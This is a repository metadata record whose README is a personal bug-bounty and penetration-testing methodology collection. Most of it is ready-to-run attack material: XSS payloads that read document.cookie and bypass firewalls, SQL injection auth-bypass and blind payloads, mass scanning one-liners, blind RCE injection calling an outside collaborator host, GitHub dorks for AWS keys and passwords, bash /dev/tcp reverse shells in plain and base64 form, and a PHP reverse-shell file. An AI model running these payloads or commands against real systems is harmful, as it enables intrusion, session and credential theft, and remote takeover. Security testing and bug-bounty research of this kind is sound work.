{"id":21109328,"url":"https://github.com/xalgord/my-methodologies","last_synced_at":"2026-02-27T15:03:52.216Z","repository":{"id":162660582,"uuid":"338345526","full_name":"xalgord/My-Methodologies","owner":"xalgord","description":"Tools and methods that I personally use for Recon and Exploitations","archived":false,"fork":false,"pushed_at":"2025-02-26T06:54:47.000Z","size":1282,"stargazers_count":34,"open_issues_count":0,"forks_count":13,"subscribers_count":4,"default_branch":"main","last_synced_at":"2025-02-26T07:33:36.483Z","etag":null,"topics":["bug-bounty","bugbounty","penetration-testing","pentesting","recon","xss"],"latest_commit_sha":null,"homepage":"https://methodological-notes.gitbook.io/methodology/","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/xalgord.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2021-02-12T14:43:41.000Z","updated_at":"2025-02-26T06:54:50.000Z","dependencies_parsed_at":null,"dependency_job_id":"1d617755-6ef5-4791-afaf-302dec9ba3d9","html_url":"https://github.com/xalgord/My-Methodologies","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/xalgord%2FMy-Methodologies","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/xalgord%2FMy-Methodologies/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/xalgord%2FMy-Methodologies/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/xalgord%2FMy-Methodologies/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/xalgord","download_url":"https://codeload.github.com/xalgord/My-Methodologies/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243558458,"owners_count":20310569,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bug-bounty","bugbounty","penetration-testing","pentesting","recon","xss"],"created_at":"2024-11-20T00:53:04.133Z","updated_at":"2026-02-27T15:03:47.178Z","avatar_url":"https://github.com/xalgord.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"---\ndescription: 'description: For Personal Reference'\n---\n\n# 🧑‍🏫 My Methodologies\n\n{% embed url=\"https://github.com/xalgord\" %}\n\n#### Gathering Breached Credentials\n\n* [https://github.com/hmaverickadams/breach-parse](https://github.com/hmaverickadams/breach-parse)\n\n#### file upload vulnerability test\n\n* [https://github.com/epinna/weevely3](https://github.com/epinna/weevely3)\n\n### Common Ports for a web Application:\u0026#x20;\n\n{% code overflow=\"wrap\" %}\n```\n20, 21, 22, 23, 25, 53, 67, 68, 69, 80, 110, 123, 137, 138, 139, 143, 161, 162, 179, 194, 389, 443, 465, 514, 515, 587, 631, 636, 989, 990, 993, 995, 1080, 1433, 1521, 1723, 3306, 3389, 5432, 5900, 6379, 8000, 8080, 8443, 9000, 9200, 27017, 50000\n```\n{% endcode %}\n\n\n\n**Set domain scope (burpsuite)**\n\n```\n.*\\.target\\.com$\n```\n\n#### XSS recon methodology\n\n▶ cat domains.txt | waybackurls \u003e urls\n\n```\ncat urls.txt        --\u003e read the file\n| kxss              --\u003e filter special characters\n| sed 's/=.*/=/'    --\u003e remove everything after = ,add = \n| sed 's/URL: //'   --\u003e remove URL: and white space\n| dalfox pipe       --\u003e dalfox tool for xss payload\n-b xalgord.xss.ht   --\u003e BXSS payload adder.\n```\n\n#### KXSS\n\nThe vulnerable parameter for XSS should have Unfiltered : **\\[“ ‘ \u003c \u003e $ | ( ) \\` : ; { } ]**\n\n**Payload:**\n\n```\n\"\u003e\u003cimg%20src=x%20onerror=\"alert(%27POC%20By%20Xalgord%27)\"\n```\n\n**any name tag xss payload:**\n\n```\n\u003cx onfocus=alert(1) autofocus tabindex=1\u003e\n```\n\n**Bypass Waf Pyaload:**\n\n```\n\u003c%2FScriPt\u003e\u003csCripT+class%3DXalgord\u003edocument.write(document.cookie);\u003c%2FsCriPt\u003e\n```\n\n#### Open Redirect Mass Hunt\n\n* tool = ragno, qsreplace\n\n```\npython3 ragno.py -d intensedebate.com -s -q -o ragno_urls.txt\n```\n\n```\ncat ragno_urls.txt | grep -a -i \\=http | wc -w\n```\n\n```\ncat ragno_urls.txt | grep -a -i \\=http \u003e potential_openredirect_vun.txt\n```\n\n```\ncat potential_openredirect_vun.txt | qsreplace \"http://evil.com\" | wc -w\n```\n\n```\ncat potential_openredirect_vun.txt | qsreplace \"http://evil.com\" \u003e unique_potential_openredirect.txt\n```\n\n```\ncat unique_potential_openredirect.txt | while read target_urls do; do curl -s -L $target_urls -I | grep \"evil.com\" \u0026\u0026 echo \"[Vulnerable] $target_urls \\n\"; done\n```\n\n* Example: One Liner for Hunting Mass Open Redirect\n\n```\npython3 ragno.py -d test.vulnweb.com -s -q -o ragno_urls.txt | cat ragno_urls.txt | grep -a -i \\=http | qsreplace \"http://evil.com\" | while read target_url do; do curl -s -L $target_url -I | grep \"evil.com\" \u0026\u0026 echo \"[+] [Vulnerable] $target_url \\n\"; done\n\n```\n\n#### Amass Command\n\n```\namass enum -brute -o output.txt -d example.com -v\n```\n\n#### Detect Low Hanging Bugs and Sensitive Information like API Keys, Secrets etc. including JS Files and HTML Pages\n\nFirst run Amass Scan and save its output and then run Sublist3r with bruteforce mode and also save its output in different file. Now open a Website such as https://www.textfixer.com/tools/remove-duplicate-lines.php to remove duplicate subdomains.\n\nTool: https://github.com/BitTheByte/Eagle\n\nBasic Usage:\n\n```\npython3 main.py -f domains.txt\n```\n\nAdvanced Usage:\n\n```\npython3 main.py -f domains.txt -w 10 --db output.db.json\n```\n\nTo check API keys if they vulnerable or not, use a tool such as gmapsapiscanner, it is usefull to save the time by automating the process and also if it gets any Vulnerable API, it will generate its POC itself.\n\nTool: https://github.com/ozguralp/gmapsapiscanner\n\nUsage:\n\n```\npython3 maps_api_scanner_python3.py\n```\n\n#### SQL Injection Methodologies\n\n\\*try login with admin admin and send login request to burp\n\n\\*do an active scan\n\nif show SQL injection with parameter\n\n\\#POC\n\ncopy request in txt\n\nand on sqlmap\n\n```\nsqlmap -r sql.txt --force-ssl --level 5 --risk 3 --dbs -p parameter\n```\n\nand you have a valid SQL INJ 😎😎\n\n**SQL Injection Auth Bypass:**\n\n```\n' || 1=1 # /2\n```\n\n#### Blind SQL Injection payload:\n\n```\nemail=test@gmail.com'XOR(if(now()=sysdate(),sleep(5*1),0))XOR'Z\n```\n\n#### Reflected XSS On private program\n\n1-\n\n```\namass enum -passive -norecursive -noalts -d domain .com -o domain.txt\n```\n\n2-\n\n```\ncat domain.txt | httpx -o domainhttpx.txt\n```\n\n3-\n\n```\ncat domainhttpx.txt | nuclei -t /home/xalgord/nuclei-templates\n```\n\nDONE 😎\n\n#### Find SQL injections (command combo)\n\n```\nsubfinder -d target.com | tee -a domains\ncat domains | httpx | tee -a urls.alive\ncat urls.alive | waybackurls | tee -a urls.check\ngf sqli urls.check \u003e\u003e urls.sqli\nsqlmap -m urls.sqli --dbs --batch\n```\n\nHere’s what’s going on in detail:\n\n1. First we will find all subdomains under our target domain.\n2. Next we will identify all alive web servers running on those subdomains.\n3. Waybackurls will fetch all URLs that the Wayback Machine knows about the identified alive subdomains.\n4. Now we will filter out URLs that match patterns with potential SQL injection.\n5. The final step is to run sqlmap on all identified potentially vulnerable URLs and let it do its magic.\n\nProtip: If you need to bypass WAF (Web Application Firewall) in the process, add the following options to sqlmap:\n\n```\n--level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,ifnull2ifisnull,modsecurityversioned\n```\n\n#### Get scope of Bugcrowd programs in CLI\n\nThere is a new tool in town called bcscope which can get you the scope of all bug bounty programs available on Bugcrowd platform, including the private ones.\n\nAll you have to do is to provide your Bugcrowd token like this:\n\n```\nbcscope -t \u003cYOUR-TOKEN-HERE\u003e -c 2 -p\n```\n\n![alt text](https://www.infosecmatter.com/wp-content/uploads/2020/10/list-scope-for-bugcrowd-bug-bounty-programs.jpg)\n\nQuite convenient and pretty useful!\n\nGet the tool here:\n\n* https://github.com/sw33tLie/bcscope\n\n#### Chaining file uploads with other vulns\n\nWhen testing file upload functionalities in a web application, try setting the filename to the following values:\n\n* ../../../tmp/lol.png —\u003e for path traversal\n* sleep(10)-- -.jpg —\u003e for SQL injection\n* .jpg/png —\u003e for XSS\n* ; sleep 10; —\u003e for command injections\n\nWith these payloads, we may trigger additional vulnerabilities.\n\n#### GitHub dorks for AWS, Jira, Okta .. secrets\n\nHere are some useful GitHub dorks shared by @hunter0x7 for identifying sensitive information related to Amazon AWS cloud:\n\n```\norg:Target \"bucket_name\"\norg:Target \"aws_access_key\"\norg:Target \"aws_secret_key\"\norg:Target \"S3_BUCKET\"\norg:Target \"S3_ACCESS_KEY_ID\"\norg:Target \"S3_SECRET_ACCESS_KEY\"\norg:Target \"S3_ENDPOINT\"\norg:Target \"AWS_ACCESS_KEY_ID\"\norg:Target \"list_aws_accounts\"\n```\n\nHere’s another list of GitHub dorks shared by @GodfatherOrwa for identifying various other credentials and secrets:\n\n```\n\"target.com\" password or secret\n\"target.atlassian\" password\n\"target.okta\" password\n\"corp.target\" password\n\"jira.target\" password\n\"target.onelogin\" password\ntarget.service-now password\nsome time only \"target\"\n```\n\nProtip: While you are doing GitHub dorking, try also [GitDorker](https://github.com/obheda12/GitDorker) (made by [@obheda12](https://twitter.com/obheda12)) which automates the whole process and which contains 400+ dorks in total, for easy bug bounty wins.\n\nDetailed information about GitDorker can be found [here](https://medium.com/@obheda12/gitdorker-a-new-tool-for-manual-github-dorking-and-easy-bug-bounty-wins-92a0a0a6b8d5).\n\nAlso check related tip [BBT5-8](https://www.infosecmatter.com/bug-bounty-tips-5-aug-17/#8_github_dorks_for_finding_secrets).\n\n#### Simple reflected XSS scenario\n\nHere’s an interesting bug bounty write-up leading to a reflected XSS (Cross-Site Scripting by visiting a link).\n\nThe author was able to successfully identify and exploit XSS despite the fact that the application was filtering some characters and keywords (possibly protected by WAF).\n\nHere’s what [@\\_justYnot](https://twitter.com/_justYnot) did in detail:\n\n1. Run subfinder -d target.com | httprobe -c 100 \u003e target.txt\n2. Run cat target.txt | waybackurls | gf xss | kxss\n3. Got a URL which had all the special characters unfiltered and the parameter was callback=\n4. Tried some basic XSS payloads but they weren’t working, the site was filtering some keywords in the payload (like script and alert)\n5. Then he referred to the [@PortSwigger](https://twitter.com/PortSwigger) XSS cheat sheet ([link](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet))\n6. After trying some payloads, one payload with event as onbegin worked and XSS executed successfully!\n7. Made a good report, sent it to the company last month and got rewarded \\$$\n\nThis is a perfect example why we should never give up when things get difficult. When you’ve got a lead, you have to keep pushing to get the reward! Here’s list of tools [@\\_justYnot](https://twitter.com/_justYnot) used:\n\n* https://github.com/projectdiscovery/subfinder\n* https://github.com/tomnomnom/httprobe\n* https://github.com/tomnomnom/waybackurls\n* https://github.com/tomnomnom/gf\n* https://github.com/1ndianl33t/Gf-Patterns (xss pattern)\n* https://github.com/tomnomnom/hacks/tree/master/kxss\n\n#### XSS firewall bypass techniques\n\nHere’s a list of 7 useful techniques on how we can bypass WAF (Web Application Firewall) while exploiting XSS (Cross-Site Scripting) in a web application:\n\n1. Check if the firewall is blocking only lowercase:\n\n```\n\u003csCRipT\u003ealert(1)\u003c/sCRiPt\u003e\n```\n\n2. Try to break firewall regex with new line (\\r\\n), aka. CRLF injection:\n\n```\n\u003cscript\u003e%0d%0aalert(1)\u003c/script\u003e\n```\n\n3. Try double encoding:\n\n```\n%2522\n```\n\n4. Testing for recursive filters, if firewall removes the text in bold, we will have clear payload:\n\n```\n\u003cscr\u003cscript\u003eipt\u003ealert(1);\u003c/scr\u003c/script\u003eipt\u003e\n```\n\n5. Injecting anchor tag without whitespaces:\n\n```\n\u003ca/href=\"j\u0026Tab;a\u0026Tab;v\u0026Tab;asc\u0026Tab;ri\u0026Tab;pt:alert\u0026lpar;1\u0026rpar;\"\u003e\n```\n\n6. Try to bypass whitespaces using a bullet:\n\n```\n\u003csvg•onload=alert(1)\u003e\n```\n\n7. Try to change request method (POST instead of GET):\n\nGET /?q=xss POST /q=xss\n\n8. Try capatalizing alert function:\n\n```\n\u003c/textarea\u003e\u003cimg src=x onerror=”var pop=’ALERT(document.cookie);’; eval(pop.toLowerCase());”\n```\n\n#### Short XSS Payload:\n\n```\n\u003cscript/src=//NJ.₨\u003e\u003c/script\u003e\n```\n\n#### Hex XSS Payloads:\n\n```\n\u003c/title\u003e\u003cscRipt\u003ealert(0x00C57D)\u003c/scRipt\u003e\n\u003ciMg src%3dN onerror%3dalert(0x0036A9)\u003e\n\u003ciMg src%3dN onerror%3dalert(0x000D98)\u003e\n```\n\n### Throw this into EVERY parameter you see\n\n```\n'\"`\u003e\u003cimg src=x\u003e${{7*7}}\n```\n\n```\n'\"` =====\u003e SQLi testing\n'\"` ======\u003e JS inject\n'\"`\u003e ======\u003e html tag attribute inject\n\u003cimg src=x\u003e =====\u003e html inject\n${{7*7}} ======\u003e CSTI\n```\n\nby @theXSSrat\n\n#### Nuclei CVE-2023-24488 Citrix XSS - Easy Bug Bounty\n\n**Command**:\\\nsubfinder -d [target.com](http://target.com/) -silent | nuclei -t http/cves/2023/CVE-2023-24488.yaml\\\n\\\nassetfinder [target.com](http://target.com/) | nuclei -t http/cves/2023/CVE-2023-24488.yaml\\\n\\\n**Template**: [xss-nuclei-template-cve-2023-24488.yaml.md](xss-nuclei-template-cve-2023-24488.yaml.md \"mention\")\\\n\\\n**Shodan Dork**:\\\nssl:[target.com](http://target.com/) title:\"Citrix gateway\"\\\n\\\n**Dork**:\\\nintitle:\"Citrix Gateway\" -site:[citrix.com](http://citrix.com/)\n\n#### Some awesome people on twitter\n\n* [@Dark\\_Knight](https://twitter.com/_Dark_Knight_)\n* [@El3ctr0Byt3s](https://twitter.com/El3ctr0Byt3s)\n* [@sw33tLie](https://twitter.com/sw33tLie)\n* [@sillydadddy](https://twitter.com/sillydadddy)\n* [@manas\\_hunter](https://twitter.com/manas_hunter)\n* [@hunter0x7](https://twitter.com/hunter0x7)\n* [@GodfatherOrwa](https://twitter.com/GodfatherOrwa)\n* [@\\_justYnot](https://twitter.com/_justYnot)\n* [@0xAsm0d3us](https://twitter.com/0xAsm0d3us)\n* [@sratarun](https://twitter.com/sratarun)\n* [@cry\\_\\_pto](https://twitter.com/cry__pto)\n* [@RathiArpeet](https://twitter.com/RathiArpeet)\n* [@Alra3ees](https://twitter.com/Alra3ees)\n* [@N008x](https://twitter.com/N008x)\n\n#### Find all Subdomains in a Single Shot\n\n```\ncat domains.txt | while read url; do dom=$(assetfinder --subs-only $url|tee $url.txt;crobat -s $url|tee -a $url.txt|subfinder -d $url -silent|tee -a $url.txt |cat $url.txt|httprobe|sort -u \u003e final-$url.txt);echo -e \"\\e[1;33m[-]Working with $url\"\"\\e[1;32m\\n  -\u003e done File saved. Please check :)\"\"\\n\";done\n```\n\n#### VHOST Fuzzing using FFUF\n\n```\nffuf -w ~/wordlists/subdomains.txt -H \"Host: FUZZ.ffuf.me\" -u http://ffuf.me\n```\n\n#### Directory Fuzzing using FFUF\n\n```\nffuf -u $url/FUZZ -w ~/custom-list/custom.txt -mc all -fc 404,403,400,401,403,500 -ac -c true -r -recursion\n```\n\n#### Feroxbuster directory fuzzing\n\n```\nferoxbuster -u $url -w /usr/share/wordlists/onelistforallshort.txt -C 404,403,429,400,401,405,302 -k\n```\n\n#### Check all methods on domainlist for Information Disclosure\n\n```\ncat domains.txt | httprobe | while read url;do ww=$(for i in \"GET\" \"PUT\" \"HEAD\" \"POST\" \"TRACE\" \"CONNECT\" \"OPTIONS\";do curl -s -L -I -X $i $url;done|grep HTTP|grep -v '301 '|awk '{ printf \"%3d: %s\\n\", NR, $0 }');echo -e \"\\e[1;32m$url\\e[0m\"\"\\n\"\"$ww\"\"\\n\";done\n```\n\n#### Path based xss with different type methods.\n\n1. Inject payload in every path and check xss\n2. append fake paramters in every path and check xss vulnerability\n3. made poc for you in your terminal\n\n```\ncat domains.txt|gau|egrep -v '(.js|.css|.svg|.jpeg|.jpg)'|grep -v '='|while read url; do dir=$(curl -s -L \"$url/xss\\\"\u003e\u003c\"|egrep -o '(xss\"|xss\\\\\")') dir2=$(curl -s -L \"$url/?xss\\\"\u003e\u003c\"|egrep -o '(xss\"|xss\\\\\")') ;echo -e \"Target:\\e[1;33m $url\\e[0m\"\"\\n\" \"\\e[1;32m Method1 -\u003e $dir\\e[0m [POC: $url/test\\\"\u003e\u003c]\"\"\\n\"\"\\e[1;32m  Method2 -\u003e $dir2\\e[0m [POC: $url/?test\\\"\u003e\u003c]\";done | egrep '(Target|xss)'\n```\n\n#### Find Blind RCE with automation\n\n```\ncat domains.txt|assetfinder --subs-only|httprobe|gau|grep -Ev (.js|.png|.svg|.jpeg)|grep '='|qsreplace -a ' ||curl //burp-collaborator.burpcollaborator.net'|while read url; do rce=$(curl -s $url);echo -e \"[RCE-test] $url\";done\n```\n\nIf you get Response of your burp collab! Boom RCE\n\n#### Scan open ports of domain list using masscan\n\n```\ncat domains.txt | httpx -ip -silent| awk '{print $2}' | sed -e 's/\\[//g' -e 's/\\]//g' | tee ips.txt | while read url; do mass=$(sudo masscan --ports 0-65535 $url);echo -e \"$url \\n $mass\";done\n```\n\n#### Easy way to find Path based XSS\n\n```\ncat domains.txt | gau | egrep -v '(=|.png|.svg|.jpg|.jpeg|.gif|.js|.js|.css)' | while read url; do dir=$(curl -s -L \"$url/xss\\\"\u003e\u003c\"|grep 'xss\"');echo -e \"Target:\\e[1;33m $url/\\\"\u003e\u003c\\e[0m\"\"\\n\" \"\\e[1;32m$dir\\e[0m\";done\n```\n\n#### Where to look for Blind XSS\n\n1. Review Forms\n2. Contact Us pages\n3. Password Field (you never know if the other side doesn't properly handle input and if your password is in view mode)\n4. Address fields of e-commerce sites.\n5. First or last name field while doing credit card payments\n6. Set User-Agent to Blind XSS payload. You can do that easily from a proxy such as Burpsuite. And there are many more cases, but we would encourage you to read some reports to get a perfect knowledge, where other hackers are already applying these techniques and how you can use them in your program\n\n#### Find Google map API keys in JS files \u0026 endpoints from Domains \u0026 Subdomains.\n\n```\ncat urls.txt | assetfinder|gau|egrep -v'(.png|.svg|.gif|.jpg|.jpeg|.txt|.ico|.css|\\?|.pdf)'|while read url; do map=$(curl -s $url|grep 'AIza');echo -e \"$url -\u003e $map\";done\n```\n\n#### Find P1 Bug in a minute\n\n**For Checking SSTI Vulnerability..**\n\n```\ncat urls.txt |gau -subs|grep '='| egrep -v '(.js|.png|.svg|.gif|.jpg|.jpeg|.txt|.css|.ico)'|qsreplace \"ssti{{7*7}}\" | while read url;do cur=$(curl -s $url | grep \"ssti49\"); echo -e \"$url -\u003e $cur\";done\n```\n\nOutput: https://example.com/?s=ssti\\{{7\\*7\\}} -\u003e ssti49 --\u003e Means Vulnerable\n\n#### Check sqli Vulnerability in One shot of domains \u0026 subdomains\n\n```\ncat urls.txt | gau | egrep -v '(.js|.png|.svg|.gif|.jpg|.jpeg|.txt)' | gf sqli|urlive|tee sqli.txt \u0026\u0026 sqlmap -m sqli.txt --dbs --batch\n```\n\n#### Find xmlrpc in single shot on domain \u0026 subdomains.\n\n```\ncat domains.txt | assetfinder --subs-only | httprobe| while read url; do xml=$(curl -s -L $url/xmlrpc.php|grep 'XML-RPC');echo -e \"$url -\u003e $xml\";done | grep 'XML-RPC' |sort -u\n```\n\nOutput: https://example.com -\u003e XML-RPC server accepts POST requests only\n\n#### JSFScan.sh usage\n\n```\nbash JSFScan.sh -l targets.txt --all -r -o filname\n```\n\n#### XSS Normal test input\n\n```\n\"\u003e\u003cu\u003eXalgord\u003c/u\u003e\u003cmarquee onstart='prompt(document.cookie)';\u003eXSS\u003c/marquee\u003e\n```\n\n***\n\n### **Mobile App Testing Guide:**\n\n* **Android:** [Intercept traffic with BurpSuite](https://www.youtube.com/watch?v=xp8ufidc514).\n* **iOS:** [Proxy traffic using BurpSuite](https://www.youtube.com/watch?v=VVQtVeUxcdM).\n\n### Find hidden GET parameters in JS files\n\n{% code overflow=\"wrap\" %}\n```bash\nassetfinder example.com | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo \"var [a-zA-Z0-9]+\" | sed -e 's,'var','\"$url\"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/\u0026=xss/g'); echo -e \"\\e[1;33m$url\\n\\e[1;32m$vars\"; done\n```\n{% endcode %}\n\n### Get Reverse Shell:\n\n```bash\n;$(bash -c 'bash -i \u003e\u0026 /dev/tcp/\u003cip\u003e/\u003cport\u003e 0\u003e\u00261');\n\nbash -i \u003e\u0026 /dev/tcp/10.10.16.35/1234 0\u003e\u00261 (payload)\ntest;echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzEyMzQgMD4mMQo= |\nbase64 -d | bash;    (enocoded payload)\n\ntest;echo 'bash -i \u003e\u0026 /dev/tcp/10.10.16.35/9001 0\u003e\u00261' | bash;\n```\n\n### Depixelate images\n\n```bash\npdfimages \u003cpdf-file\u003e \u003coutput-file\u003e\npython3 depix.py -p \u003cpixelized-image\u003e.ppm -s \u003creference-image\u003e\n```\n\n### Reverse shell using ZIP file:\n\n{% file src=\".gitbook/assets/rce.zip\" %}\n\nthe code in this:\n\n```php\n\u003c?php echo system(\"echo 'bash -i \u003e\u0026 /dev/tcp/10.10.16.35/9001 0\u003e\u00261' | bash;\") ?\u003ebash\n```\n\n#### Opposite to Keyhacks -\u003e nokeyhacks:\n\n{% embed url=\"https://gitlab.com/dee-see/notkeyhacks\" %}\n\n![Screenshot\\_2021-03-16-16-34-20-695\\_com google android youtube](https://user-images.githubusercontent.com/48483027/111305580-284b7580-867d-11eb-8704-dee84bb789e9.jpg)\n\n#### Increase XSS vulnerability impact\n\n* [https://hacklido.com/blog/320-how-i-got-a-2000-bounty-with-rxss](https://hacklido.com/blog/320-how-i-got-a-2000-bounty-with-rxss)\n\n#### Mindmaps for Penetration Testing\n\n\u003cfigure\u003e\u003cimg src=\"https://user-images.githubusercontent.com/48483027/111863466-c68f5200-8981-11eb-9569-38fb5eacf8c9.png\" alt=\"\"\u003e\u003cfigcaption\u003e\u003c/figcaption\u003e\u003c/figure\u003e\n\n![assessment-mindset](https://user-images.githubusercontent.com/48483027/111871365-8ba41300-89af-11eb-944f-287a74f48a7f.png)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fxalgord%2Fmy-methodologies","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fxalgord%2Fmy-methodologies","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fxalgord%2Fmy-methodologies/lists"}